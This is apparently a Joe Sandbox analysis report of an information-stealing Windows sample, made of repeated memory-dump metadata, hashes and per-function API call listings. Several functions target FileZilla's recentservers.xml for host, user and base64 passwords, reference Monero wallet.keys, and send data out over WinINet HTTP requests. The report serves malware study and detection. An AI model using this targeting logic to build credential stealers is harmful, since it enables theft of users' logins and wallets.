                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 416fb05ab863a4fb1250bf2a33698c6ebd4e9719298f9c1ad38de386fc2dedba
                                    • Instruction ID: 01b042ca2ca4443adb105b299cb5e0d0113af665bbb0909c1fbba7381433e107
                                    • Opcode Fuzzy Hash: 416fb05ab863a4fb1250bf2a33698c6ebd4e9719298f9c1ad38de386fc2dedba
                                    • Instruction Fuzzy Hash: 035102F3F186000BF304593EEDC6366B6D7EBE4320F2B423D9A99C7784E87A48064186
                                    Function 00434F2E Relevance: .2, Instructions: 169COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: af0ca970d46086689ddeea6465da576a17b742ba19458afe68072b1778e07ac4
                                    • Instruction ID: 05fa221571c1e30b9e2dff1b15327e39e0efefb97b5a88372ce0f7e8b9fb8ca8
                                    • Opcode Fuzzy Hash: af0ca970d46086689ddeea6465da576a17b742ba19458afe68072b1778e07ac4
                                    • Instruction Fuzzy Hash: C95139F3A082009FF3545E19EC847AABBD6EBD4320F16463DDB98C73C0D93E58058696
                                    Function 004F41B3 Relevance: .1, Instructions: 78COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 22b6e17d758bf08d203e4935fbdddf3ed8b57cc58d66fe990f147a79d0944d7c
                                    • Instruction ID: b00097125d594c8825a3888727e676e0ef1b19122fc487ff07b1a698c2a8aace
                                    • Opcode Fuzzy Hash: 22b6e17d758bf08d203e4935fbdddf3ed8b57cc58d66fe990f147a79d0944d7c
                                    • Instruction Fuzzy Hash: 8A2150B210C6049FE319FE69DC86BBAB7E5EF48321F02492DE6D5C3750DA3594408A97
                                    Function 00099750 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 00090250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                      • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                      • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                      • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                      • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                      • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                      • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,000A0DBA,000A0DB7,000A0DB6,000A0DB3), ref: 00090362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00090369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00090385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 000903CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 000903DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00090419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00090463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 00090532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00090562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00090571
                                    • lstrcat.KERNEL32(?,url: ), ref: 00090580
                                    • lstrcat.KERNEL32(?,00000000), ref: 00090593
                                    • lstrcat.KERNEL32(?,000A1678), ref: 000905A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 000905B5
                                    • lstrcat.KERNEL32(?,000A167C), ref: 000905C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 000905D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 000905E6
                                    • lstrcat.KERNEL32(?,000A1688), ref: 000905F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 00090604
                                    • lstrcat.KERNEL32(?,00000000), ref: 00090617
                                    • lstrcat.KERNEL32(?,000A1698), ref: 00090626
                                    • lstrcat.KERNEL32(?,000A169C), ref: 00090635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000A0DB2), ref: 0009068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: f4922ff3eba11b0cbfec9a467640ea3c783b1f1a55edbd76a4eb99a8160386bb
                                    • Instruction ID: 26a71375fe7cf59646eeb0f5a46f1f78dd055a55f5bd2fe3c539a21402777595
                                    • Opcode Fuzzy Hash: f4922ff3eba11b0cbfec9a467640ea3c783b1f1a55edbd76a4eb99a8160386bb
                                    • Instruction Fuzzy Hash: F7D11271A10108ABCF04FBF4DD9AEEEB778BF55300F544518F502A6192DF74AA09DBA2
                                    Function 00085960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                      • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000859F8
                                    • StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 00085A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00085B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00D3FCB0,00000000,?,00D3EEC0,00000000,?,000A1A1C), ref: 00085E71
                                    • lstrlen.KERNEL32(00000000), ref: 00085E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00085E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00085E9A
                                    • lstrlen.KERNEL32(00000000), ref: 00085EAF
                                    • lstrlen.KERNEL32(00000000), ref: 00085ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00085EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00085F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00085F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00085F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00085FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00085FBD
                                    • HttpOpenRequestA.WININET(00000000,00D3FC80,?,00D3F488,00000000,00000000,00400100,00000000), ref: 00085BF8
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00085FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: ec2d5cf6aa3bda60b11e0a5976da56f14f62a6a1860e9bdf1f0abef04c4336c4
                                    • Instruction ID: 01ad0608136a4458954159b11eae316532c0e78bc1811adb73275fc2185d33b9
                                    • Opcode Fuzzy Hash: ec2d5cf6aa3bda60b11e0a5976da56f14f62a6a1860e9bdf1f0abef04c4336c4
                                    • Instruction Fuzzy Hash: 8A12F171920128ABDF15EBA0DC95FEEB378BF15700F504199F10A66092EF702B49DFA6
                                    Function 0008CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D3EEF0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008CF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0008D0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0008D0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D208
                                    • lstrcat.KERNEL32(?,000A1478), ref: 0008D217
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D22A
                                    • lstrcat.KERNEL32(?,000A147C), ref: 0008D239
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D24C
                                    • lstrcat.KERNEL32(?,000A1480), ref: 0008D25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D26E
                                    • lstrcat.KERNEL32(?,000A1484), ref: 0008D27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D290
                                    • lstrcat.KERNEL32(?,000A1488), ref: 0008D29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D2B2
                                    • lstrcat.KERNEL32(?,000A148C), ref: 0008D2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 0008D2D4
                                    • lstrcat.KERNEL32(?,000A1490), ref: 0008D2E3
                                      • Part of subcall function 0009A820: lstrlen.KERNEL32(00084F05,?,?,00084F05,000A0DDE), ref: 0009A82B
                                      • Part of subcall function 0009A820: lstrcpy.KERNEL32(000A0DDE,00000000), ref: 0009A885
                                    • lstrlen.KERNEL32(?), ref: 0008D32A
                                    • lstrlen.KERNEL32(?), ref: 0008D339
                                      • Part of subcall function 0009AA70: StrCmpCA.SHLWAPI(00D38C28,0008A7A7,?,0008A7A7,00D38C28), ref: 0009AA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0008D3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: e2017d07ad5d889e9eb3ebfa77898b83af28c8001bd0dbfb296365f5ad6a13e1
                                    • Instruction ID: 9f91a894d96f6b8abc57c70f1f32c4f30cb7aaddbdd5b8d7c76b6170fe01af7b
                                    • Opcode Fuzzy Hash: e2017d07ad5d889e9eb3ebfa77898b83af28c8001bd0dbfb296365f5ad6a13e1
                                    • Instruction Fuzzy Hash: 2AE10171A10118ABCF04FBA0ED9AEEE7378BF15305F104159F507A6092DF35AE09DBA6
                                    Function 0008C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                      • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00D3DE98,00000000,?,000A144C,00000000,?,?), ref: 0008CA6C
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0008CA89
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0008CA95
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008CAA8
                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0008CAD9
                                    • StrStrA.SHLWAPI(?,00D3DE20,000A0B52), ref: 0008CAF7
                                    • StrStrA.SHLWAPI(00000000,00D3DE38), ref: 0008CB1E
                                    • StrStrA.SHLWAPI(?,00D3E148,00000000,?,000A1458,00000000,?,00000000,00000000,?,00D38C08,00000000,?,000A1454,00000000,?), ref: 0008CCA2
                                    • StrStrA.SHLWAPI(00000000,00D3E368), ref: 0008CCB9
                                      • Part of subcall function 0008C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0008C871
                                      • Part of subcall function 0008C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0008C87C
                                    • StrStrA.SHLWAPI(?,00D3E368,00000000,?,000A145C,00000000,?,00000000,00D38C18), ref: 0008CD5A
                                    • StrStrA.SHLWAPI(00000000,00D38A58), ref: 0008CD71
                                      • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B46), ref: 0008C943
                                      • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B47), ref: 0008C957
                                      • Part of subcall function 0008C820: lstrcat.KERNEL32(?,000A0B4E), ref: 0008C978
                                    • lstrlen.KERNEL32(00000000), ref: 0008CE44
                                    • CloseHandle.KERNEL32(00000000), ref: 0008CE9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
